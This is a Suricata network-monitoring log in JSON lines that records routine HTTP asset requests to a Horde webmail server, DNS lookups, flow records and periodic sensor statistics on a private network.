{"timestamp":"2020-02-29T00:23:14.062479+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":11}} {"timestamp":"2020-02-29T00:23:14.063474+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":15}} {"timestamp":"2020-02-29T00:23:14.101269+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:23:14.105302+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:23:14.105284+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:23:17.000362+0000","event_type":"stats","stats":{"uptime":15049,"capture":{"kernel_packets":140100,"kernel_drops":0},"decoder":{"pkts":140123,"bytes":96193959,"invalid":195,"ipv4":138552,"ipv6":10,"ethernet":140123,"raw":0,"null":0,"sll":0,"tcp":133002,"udp":5340,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2879,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2895,"synack":2886,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1896,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2443,"failed_udp":116},"tx":{"http":4909,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2525}},"flow_mgr":{"closed_pruned":2854,"new_pruned":17,"est_pruned":2504,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":6,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65529,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17848,"memcap_state":0,"memcap_global":0},"http":{"memuse":139487,"memcap":0}}} {"timestamp":"2020-02-29T00:23:18.000476+0000","flow_id":706061179386444,"event_type":"flow","src_ip":"192.168.10.122","src_port":55199,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:17.555596+0000","end":"2020-02-29T00:18:17.664296+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:18.576630+0000","flow_id":1779901807041841,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52976,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":0}} {"timestamp":"2020-02-29T00:23:19.062979+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":12}} {"timestamp":"2020-02-29T00:23:19.064032+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":4}} {"timestamp":"2020-02-29T00:23:19.066893+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":16}} {"timestamp":"2020-02-29T00:23:20.000471+0000","flow_id":65256369099473,"event_type":"flow","src_ip":"192.168.10.130","src_port":34270,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":33,"pkts_toclient":62,"bytes_toserver":3563,"bytes_toclient":80705,"start":"2020-02-29T00:22:11.398033+0000","end":"2020-02-29T00:22:16.434766+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:20.453231+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35494,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21489,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:20.561932+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35494,"proto":"UDP","dns":{"type":"answer","id":21489,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:20.561932+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35494,"proto":"UDP","dns":{"type":"answer","id":21489,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:20.668550+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412}} {"timestamp":"2020-02-29T00:23:20.668550+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:23:23.000290+0000","flow_id":574334532723092,"event_type":"flow","src_ip":"192.168.10.122","src_port":36137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:22.074132+0000","end":"2020-02-29T00:18:22.182286+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:23.000546+0000","flow_id":773543705896811,"event_type":"flow","src_ip":"192.168.10.122","src_port":59659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:22.255851+0000","end":"2020-02-29T00:18:22.365114+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:24.000208+0000","event_type":"stats","stats":{"uptime":15056,"capture":{"kernel_packets":140139,"kernel_drops":0},"decoder":{"pkts":140146,"bytes":96197273,"invalid":195,"ipv4":138573,"ipv6":10,"ethernet":140146,"raw":0,"null":0,"sll":0,"tcp":133021,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2505,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":40078,"memcap":0}}} {"timestamp":"2020-02-29T00:23:25.669546+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52980,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":0}} {"timestamp":"2020-02-29T00:23:31.000213+0000","event_type":"stats","stats":{"uptime":15063,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} {"timestamp":"2020-02-29T00:23:38.000217+0000","event_type":"stats","stats":{"uptime":15070,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} {"timestamp":"2020-02-29T00:23:38.001500+0000","flow_id":1879111253891026,"event_type":"flow","src_ip":"192.168.10.81","src_port":52966,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":784,"bytes_toclient":908,"start":"2020-02-29T00:22:32.464850+0000","end":"2020-02-29T00:22:37.472548+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001723+0000","flow_id":503789711071144,"event_type":"flow","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":61,"pkts_toclient":77,"bytes_toserver":10547,"bytes_toclient":94902,"start":"2020-02-29T00:22:29.464808+0000","end":"2020-02-29T00:22:37.767328+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001819+0000","flow_id":1506488481224280,"event_type":"flow","src_ip":"192.168.10.81","src_port":52962,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":784,"bytes_toclient":910,"start":"2020-02-29T00:22:32.464472+0000","end":"2020-02-29T00:22:37.471831+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001870+0000","flow_id":381567826925203,"event_type":"flow","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1360,"bytes_toclient":1913,"start":"2020-02-29T00:22:32.464531+0000","end":"2020-02-29T00:22:37.472507+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:39.000252+0000","flow_id":12900719167830,"event_type":"flow","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":37,"bytes_toserver":4664,"bytes_toclient":43270,"start":"2020-02-29T00:22:32.362838+0000","end":"2020-02-29T00:22:38.037589+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:39.000471+0000","flow_id":730770142977525,"event_type":"flow","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":53,"pkts_toclient":73,"bytes_toserver":6982,"bytes_toclient":92760,"start":"2020-02-29T00:22:32.318965+0000","end":"2020-02-29T00:22:38.042472+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:44.000688+0000","flow_id":110173123482339,"event_type":"flow","src_ip":"192.168.10.122","src_port":49631,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:43.889571+0000","end":"2020-02-29T00:18:43.998032+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:45.000149+0000","event_type":"stats","stats":{"uptime":15077,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2861,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16855,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:23:47.000853+0000","flow_id":1826094178214393,"event_type":"flow","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1070,"bytes_toclient":732,"start":"2020-02-29T00:22:41.369145+0000","end":"2020-02-29T00:22:46.542040+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:52.000303+0000","event_type":"stats","stats":{"uptime":15084,"capture":{"kernel_packets":140243,"kernel_drops":0},"decoder":{"pkts":140247,"bytes":96281893,"invalid":195,"ipv4":138672,"ipv6":10,"ethernet":140247,"raw":0,"null":0,"sll":0,"tcp":133120,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2881,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2897,"synack":2888,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2508,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16855,"memcap_state":0,"memcap_global":0},"http":{"memuse":400,"memcap":0}}} {"timestamp":"2020-02-29T00:23:52.000998+0000","flow_id":1992764664025219,"event_type":"flow","src_ip":"192.168.10.122","src_port":52667,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:51.102531+0000","end":"2020-02-29T00:18:51.207491+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:53.234003+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36710,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3775,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:53.345755+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36710,"proto":"UDP","dns":{"type":"answer","id":3775,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 